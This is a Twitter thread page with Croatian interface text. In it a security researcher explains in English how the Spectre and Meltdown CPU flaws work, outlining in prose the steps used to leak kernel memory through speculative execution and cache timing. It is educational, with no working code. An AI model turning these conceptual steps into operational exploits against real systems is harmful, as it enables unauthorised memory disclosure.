Preskoči na sadržaj
Korištenjem servisa na Twitteru pristajete na korištenje kolačića. Twitter i partneri rade globalno te koriste kolačiće za analize, personalizaciju i oglase.

Za najbolje sučelje na Twitteru koristite Microsoft Edge ili instalirajte aplikaciju Twitter iz trgovine Microsoft Store.

  • Naslovnica Naslovnica Naslovnica, trenutna stranica.
  • O Twitteru

Spremljena pretraživanja

  • obriši
  • U ovom razgovoru
    Ovjeren akauntZaštićeni tweetovi @
Predloženi korisnici
  • Ovjeren akauntZaštićeni tweetovi @
  • Ovjeren akauntZaštićeni tweetovi @
  • Jezik: Hrvatski
    • Bahasa Indonesia
    • Bahasa Melayu
    • Català
    • Čeština
    • Dansk
    • Deutsch
    • English
    • English UK
    • Español
    • Filipino
    • Français
    • Italiano
    • Magyar
    • Nederlands
    • Norsk
    • Polski
    • Português
    • Română
    • Slovenčina
    • Suomi
    • Svenska
    • Tiếng Việt
    • Türkçe
    • Български език
    • Русский
    • Српски
    • Українська мова
    • Ελληνικά
    • עִבְרִית
    • العربية
    • فارسی
    • मराठी
    • हिन्दी
    • বাংলা
    • ગુજરાતી
    • தமிழ்
    • ಕನ್ನಡ
    • ภาษาไทย
    • 한국어
    • 日本語
    • 简体中文
    • 繁體中文
  • Imate račun? Prijava
    Imate račun?
    · Zaboravili ste lozinku?

    Novi ste na Twitteru?
    Registrirajte se
Profil korisnika/ce gsuberland
Graham Sutherland [Polynomial^DSS]
Graham Sutherland [Polynomial^DSS]
Graham Sutherland [Polynomial^DSS]
@gsuberland

Tweets

Graham Sutherland [Polynomial^DSS]

@gsuberland

Infosec person (he/him) focusing on maritime, hardware, winternals, crypto. Content includes: electronics, tech, mental health, chemistry, lasers, demoscene.

The mining ship Red Dwarf.
poly.nomial.co.uk
Vrijeme pridruživanja: prosinac 2011.

Tweets

  • © 2020 Twitter
  • O Twitteru
  • Centar za pomoć
  • Uvjeti
  • Pravila o privatnosti
  • Imprint
  • Kolačići
  • Informacije o oglasima
Odbaci
Prethodni
Sljedeće

Idite na profil osobe

Spremljena pretraživanja

  • obriši
  • U ovom razgovoru
    Ovjeren akauntZaštićeni tweetovi @
Predloženi korisnici
  • Ovjeren akauntZaštićeni tweetovi @
  • Ovjeren akauntZaštićeni tweetovi @

Odjava

Blokiraj

  • Objavi Tweet s lokacijom

    U tweetove putem weba ili aplikacija drugih proizvođača možete dodati podatke o lokaciji, kao što su grad ili točna lokacija. Povijest lokacija tweetova uvijek možete izbrisati. Saznajte više

    Vaši popisi

    Izradi novi popis


    Manje od 100 znakova, neobavezno

    Privatnost

    Kopiraj vezu u tweet

    Ugradi ovaj Tweet

    Embed this Video

    Dodajte ovaj Tweet na svoje web-mjesto kopiranjem koda u nastavku. Saznajte više

    Dodajte ovaj videozapis na svoje web-mjesto kopiranjem koda u nastavku. Saznajte više

    Hm, došlo je do problema prilikom povezivanja s poslužiteljem.

    Integracijom Twitterova sadržaja u svoje web-mjesto ili aplikaciju prihvaćate Twitterov Ugovor za programere i Pravila za programere.

    Pregled

    Razlog prikaza oglasa

    Prijavi se na Twitter

    · Zaboravili ste lozinku?
    Nemate račun? Registrirajte se »

    Prijavite se na Twitter

    Niste na Twitteru? Registrirajte se, uključite se u stvari koje vas zanimaju, i dobivajte promjene čim se dogode.

    Registrirajte se
    Imate račun? Prijava »

    Dvosmjerni (slanje i primanje) kratki kodovi:

    Država Kod Samo za korisnike
    Sjedinjene Američke Države 40404 (bilo koje)
    Kanada 21212 (bilo koje)
    Ujedinjeno Kraljevstvo 86444 Vodafone, Orange, 3, O2
    Brazil 40404 Nextel, TIM
    Haiti 40404 Digicel, Voila
    Irska 51210 Vodafone, O2
    Indija 53000 Bharti Airtel, Videocon, Reliance
    Indonezija 89887 AXIS, 3, Telkomsel, Indosat, XL Axiata
    Italija 4880804 Wind
    3424486444 Vodafone
    » Pogledajte SMS kratke šifre za druge zemlje

    Potvrda

     

    Dobro došli kući!

    Vremenska crta mjesto je na kojem ćete provesti najviše vremena i bez odgode dobivati novosti o svemu što vam je važno.

    Tweetovi vam ne valjaju?

    Prijeđite pokazivačem preko slike profila pa kliknite gumb Pratim da biste prestali pratiti neki račun.

    Kažite mnogo uz malo riječi

    Kada vidite Tweet koji volite, dodirnite srce – to osobi koja ga je napisala daje do znanja da vam se sviđa.

    Proširite glas

    Najbolji je način da podijelite nečiji Tweet s osobama koje vas prate prosljeđivanje. Dodirnite ikonu da biste smjesta poslali.

    Pridruži se razgovoru

    Pomoću odgovora dodajte sve što mislite o nekom tweetu. Pronađite temu koja vam je važna i uključite se.

    Saznajte najnovije vijesti

    Bez odgode pogledajte o čemu ljudi razgovaraju.

    Pratite više onoga što vam se sviđa

    Pratite više računa da biste dobivali novosti o temama do kojih vam je stalo.

    Saznajte što se događa

    Bez odgode pogledajte najnovije razgovore o bilo kojoj temi.

    Ne propustite nijedan aktualni događaj

    Bez odgode pratite kako se razvijaju događaji koje pratite.

    Graham Sutherland [Polynomial^DSS]‏ @gsuberland 4. sij 2018.
    • Prijavi Tweet

    Explainer on #Spectre & #Meltdown: When a processor reaches a conditional branch in code (e.g. an 'if' clause), it tries to predict which branch will be taken before it actually knows the result. It executes that branch ahead of time - a feature called "speculative execution".

    05:22 - 4. sij 2018.
    • 2.982 proslijeđena tweeta
    • 4.888 oznaka „sviđa mi se”
    • Anderson Eduardo Sherry Bai Shaily Sangwan Saito Mano breaksh0t м Snake Sound 🦇☄️ Product London Aishwarya Krishnan
    56 replies 2.982 proslijeđena tweeta 4.888 korisnika označava da im se sviđa
      1. Novi razgovor
      2. Graham Sutherland [Polynomial^DSS]‏ @gsuberland 4. sij 2018.
        • Prijavi Tweet

        The idea is that if it gets the prediction right (which modern processors are quite good at) it'll already have executed the next bit of code by the time the actually-selected branch is known. If it gets it wrong, execution unwinds back and the correct branch is executed instead.

        20 proslijeđenih tweetova 177 korisnika označava da im se sviđa
        Prikaži ovu nit
      3. Graham Sutherland [Polynomial^DSS]‏ @gsuberland 4. sij 2018.
        • Prijavi Tweet

        What makes the processor so good at branch prediction is that it stores details about previous branch operations, in what's called the Branch History Buffer (BHB). If a particular branch instruction took path A before, it'll probably take path A again, rather than path B.

        1 reply 23 proslijeđena tweeta 177 korisnika označava da im se sviđa
        Prikaži ovu nit
      4. Graham Sutherland [Polynomial^DSS]‏ @gsuberland 4. sij 2018.
        • Prijavi Tweet

        What makes this interesting is that code is executed *speculatively*, before the result of a conditional statement has completed. That conditional statement could be security-critical. Thankfully the processor is (mostly) smart enough to roll back any side-effects of execution.

        1 reply 23 proslijeđena tweeta 185 korisnika označava da im se sviđa
        Prikaži ovu nit
      5. Graham Sutherland [Polynomial^DSS]‏ @gsuberland 4. sij 2018.
        • Prijavi Tweet

        There are two important exclusions to the rollback of side-effects: cache and branch prediction history. These generally aren't rolled back because speculative execution is a performance feature, and rolling back cache and BHB contents would generally hurt performance.

        25 proslijeđenih tweetova 166 korisnika označava da im se sviđa
        Prikaži ovu nit
      6. Graham Sutherland [Polynomial^DSS]‏ @gsuberland 4. sij 2018.
        • Prijavi Tweet

        There are three ways to exploit this behaviour. The Spectre paper describes the first two exploits, with the following results: 1. Kernel memory disclosure from userspace on bare metal. 2. Kernel memory disclosure of the VM host/hypervisor from kernelspace in a VM.

        24 proslijeđena tweeta 142 korisnika označavaju da im se sviđa
        Prikaži ovu nit
      7. Graham Sutherland [Polynomial^DSS]‏ @gsuberland 4. sij 2018.
        • Prijavi Tweet

        The first exploit works by getting the kernel to execute some carefully written attacker-specified code which contains an array bounds check followed by an array read, where the read index is controlled by an attacker. This sounds like a big ask, but it's not thanks to JIT.

        1 reply 14 proslijeđenih tweetova 136 korisnika označava da im se sviđa
        Prikaži ovu nit
      8. Graham Sutherland [Polynomial^DSS]‏ @gsuberland 4. sij 2018.
        • Prijavi Tweet

        On Linux, Extended Berkley Packet Filter (eBPF) allows users to write socket filters from usermode which get JIT compiled by the kernel in order to efficiently filter packets on a socket. The details aren't important, but it means an attacker can get the kernel to execute code.

        16 proslijeđenih tweetova 125 korisnika označava da im se sviđa
        Prikaži ovu nit
      9. Graham Sutherland [Polynomial^DSS]‏ @gsuberland 4. sij 2018.
        • Prijavi Tweet

        The exploit involves writing eBPF code which compiles to the following steps: 1. Allocate two fixed-size arrays 2. Bounds-check the user-provided index 3. If ok, read from the array1 at that index 4. Compute another index from 1 bit of the result 5. Read from array2 at that index

        1 reply 16 proslijeđenih tweetova 125 korisnika označava da im se sviđa
        Prikaži ovu nit
      10. Graham Sutherland [Polynomial^DSS]‏ @gsuberland 4. sij 2018.
        • Prijavi Tweet

        There's actually a step before 5, which is "bounds check the read to array2", but we never intend to do an out-of-bounds read here, so it's irrelevant. I omitted it because I ran out of characters.

        1 reply 10 proslijeđenih tweetova 96 korisnika označava da im se sviđa
        Prikaži ovu nit
      11. Graham Sutherland [Polynomial^DSS]‏ @gsuberland 4. sij 2018.
        • Prijavi Tweet

        In terms of "real" execution, this code always terminates at step 2 when the user passes an out-of-bounds index for array1. But if the processor's branch predictor assumes that check will succeed, it'll speculatively execute the out-of-bounds read in step 3, and continue to 5.

        1 reply 12 proslijeđenih tweetova 116 korisnika označava da im se sviđa
        Prikaži ovu nit
      12. Graham Sutherland [Polynomial^DSS]‏ @gsuberland 4. sij 2018.
        • Prijavi Tweet

        Here's the clever bit. In step 4 we take the value we got from the out-of-bounds read (which we wouldn't normally have access to) and use one bit from it to select a particular memory address (array index) to read. If b=0 it reads index 0x200; if b=1 it reads index 0x300.

        1 reply 13 proslijeđenih tweetova 124 korisnika označavaju da im se sviđa
        Prikaži ovu nit
      13. Graham Sutherland [Polynomial^DSS]‏ @gsuberland 4. sij 2018.
        • Prijavi Tweet

        This ensures that the memory at either index 0x200 or index 0x300 is now cached. The CPU then realises that the bounds check in step 2 failed, so it unwinds back to that branch. However, the data from step 5 is still cached!

        1 reply 16 proslijeđenih tweetova 127 korisnika označava da im se sviđa
        Prikaži ovu nit
      14. Graham Sutherland [Polynomial^DSS]‏ @gsuberland 4. sij 2018.
        • Prijavi Tweet

        We can then go in and read the data at 0x200 and 0x300 and see which is cached by measuring how quick the read is. Once we know which index was cached we can directly infer one bit of kernel memory, based on the index selection from step 4.

        14 proslijeđenih tweetova 140 korisnika označava da im se sviđa
        Prikaži ovu nit
      15. Graham Sutherland [Polynomial^DSS]‏ @gsuberland 4. sij 2018.
        • Prijavi Tweet

        There are some details as to how the cache needs to be primed before this attack, but it is possible to do this whole process in a loop and dump kernel memory from unprivileged userspace.

        11 proslijeđenih tweetova 120 korisnika označava da im se sviđa
        Prikaži ovu nit
      16. Graham Sutherland [Polynomial^DSS]‏ @gsuberland 4. sij 2018.
        • Prijavi Tweet

        The second attack described in the Spectre paper involves poisoning the branch prediction history to trick the processor into speculatively executing code at an attacker-specified address, leading to further cache attacks as described above.

        1 reply 14 proslijeđenih tweetova 105 korisnika označava da im se sviđa
        Prikaži ovu nit
      17. Graham Sutherland [Polynomial^DSS]‏ @gsuberland 4. sij 2018.
        • Prijavi Tweet

        By performing a carefully selected sequence of indirect jumps, an attacker can fill up the branch prediction history in a way that allows the attacker to select which branch will be speculatively executed when performing an indirect jump.

        1 reply 12 proslijeđenih tweetova 111 korisnika označava da im se sviđa
        Prikaži ovu nit
      18. Graham Sutherland [Polynomial^DSS]‏ @gsuberland 4. sij 2018.
        • Prijavi Tweet

        This can be very powerful. If I know there's a piece of code in kernel space that exhibits similar behaviour to our eBPF example from before, and I know what the address of that code is, I can indirectly jump to that code and the CPU will speculatively execute it.

        1 reply 10 proslijeđenih tweetova 94 korisnika označavaju da im se sviđa
        Prikaži ovu nit
      19. Graham Sutherland [Polynomial^DSS]‏ @gsuberland 4. sij 2018.
        • Prijavi Tweet

        If you've done exploitation before, you'll probably recognise this as being similar to a ROP gadget. We're looking for a sequence of code in kernel space that happens to have the right sequence of instructions to leak information via cache.

        1 reply 11 proslijeđenih tweetova 104 korisnika označavaju da im se sviđa
        Prikaži ovu nit
      20. Graham Sutherland [Polynomial^DSS]‏ @gsuberland 4. sij 2018.
        • Prijavi Tweet

        Keep in mind that the execution is speculative only - the processor will later realise that I didn't have the privilege to jump to that code and throw an exception. So the target code has to leak kernel data via cache side-channels like before.

        1 reply 11 proslijeđenih tweetova 99 korisnika označava da im se sviđa
        Prikaži ovu nit
      21. Graham Sutherland [Polynomial^DSS]‏ @gsuberland 4. sij 2018.
        • Prijavi Tweet

        You'll also notice that we need to know address of the target kernel code. With KASLR this isn't so easy. Project Zero's writeup explains how KASLR can be defeated using branch prediction and caching as side-channels, so I won't go into the details here. https://googleprojectzero.blogspot.co.uk/2018/01/reading-privileged-memory-with-side.html …

        1 reply 17 proslijeđenih tweetova 112 korisnika označava da im se sviđa
        Prikaži ovu nit
      22. Graham Sutherland [Polynomial^DSS]‏ @gsuberland 4. sij 2018.
        • Prijavi Tweet

        What makes this extra powerful is that it works across VM boundaries too. Instead of a traditional indirect jump (e.g. jmp eax), we can use the vmcall instruction to speculatively execute code within the VM host's kernel in the same way we would our VM's kernel.

        1 reply 19 proslijeđenih tweetova 112 korisnika označava da im se sviđa
        Prikaži ovu nit
      23. Graham Sutherland [Polynomial^DSS]‏ @gsuberland 4. sij 2018.
        • Prijavi Tweet

        Finally, there's the third approach. This involves a flush+reload cache attack against kernel memory, similar to the first variant of the attack but without requiring kernel code execution - it can all be done from usermode.

        1 reply 13 proslijeđenih tweetova 93 korisnika označavaju da im se sviđa
        Prikaži ovu nit
      24. Graham Sutherland [Polynomial^DSS]‏ @gsuberland 4. sij 2018.
        • Prijavi Tweet

        The idea is that we try to read kernelspace memory using a mov instruction, then perform a secondary memory read with an address based on the value that was read. If you're thinking the first mov will fail because we're in usermode and can't read kernel addresses, you're right.

        1 reply 12 proslijeđenih tweetova 89 korisnika označava da im se sviđa
        Prikaži ovu nit
      25. Graham Sutherland [Polynomial^DSS]‏ @gsuberland 4. sij 2018.
        • Prijavi Tweet

        The trick is that the microarchitectural implementation of mov contains the memory page privilege level check, which itself is a branch instruction. The processor may speculatively execute that branch like any other.

        13 proslijeđenih tweetova 98 korisnika označava da im se sviđa
        Prikaži ovu nit
      26. Graham Sutherland [Polynomial^DSS]‏ @gsuberland 4. sij 2018.
        • Prijavi Tweet

        So, if you can outrun the interrupt, you can speculatively execute some other instruction that loads data into cache based on the value read from kernelspace. This then becomes a cache attack like the previous tricks.

        1 reply 13 proslijeđenih tweetova 103 korisnika označavaju da im se sviđa
        Prikaži ovu nit
      27. Graham Sutherland [Polynomial^DSS]‏ @gsuberland 4. sij 2018.
        • Prijavi Tweet

        And that's just about it. For full details I recommend checking out the two papers, as well as the Project Zero writeup I linked above. https://spectreattack.com/spectre.pdf  https://meltdownattack.com/meltdown.pdf 

        7 replies 54 proslijeđena tweeta 250 korisnika označava da im se sviđa
        Prikaži ovu nit
      28. Graham Sutherland [Polynomial^DSS]‏ @gsuberland 4. sij 2018.
        • Prijavi Tweet

        (this thread was never intended to be quite so long...)

        15 proslijeđenih tweetova 360 korisnika označava da im se sviđa
        Prikaži ovu nit
      29. Kraj razgovora

    Čini se da učitavanje traje već neko vrijeme.

    Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

      Sponzorirani tweet

      false

      • © 2020 Twitter
      • O Twitteru
      • Centar za pomoć
      • Uvjeti
      • Pravila o privatnosti
      • Imprint
      • Kolačići
      • Informacije o oglasima